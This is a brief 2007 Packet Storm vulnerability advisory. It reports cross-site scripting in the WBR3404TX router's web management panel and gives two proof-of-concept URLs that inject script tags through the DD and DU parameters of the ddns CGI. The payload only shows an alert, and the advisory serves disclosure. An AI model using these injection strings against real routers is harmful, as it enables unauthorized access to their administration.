wbr-xss.txt

2007-09-20T00:00:00
ID PACKETSTORM:59459
Type packetstorm
Reporter Azizov Emin
Modified 2007-09-20T00:00:00

Description

                                        
                                            `I.Overview  
Current firmware version is R1.94p0vTIG (*the latest).  
WBR3404TX Broadband Router Web Management   
  
II.Description  
http://[routeraddress]/cgi-bin/ddns?RC=%40&DG0=x&DP=D&DD=%22%3E%3Cscript%3Ealert('xss%20detected!');%3C/script%3E%3Ctext%20id=%22&DU=&DW=  
http://[routeraddress]/cgi-bin/ddns?RC=%40&DG0=x&DP=D&DD=&DU=%22%3E%3Cscript%3Ealert('xss%20detected!');%3C/script%3E%3Ctext%20id=%22&DW=  
  
Open to XSS atacks via the web management panel.  
`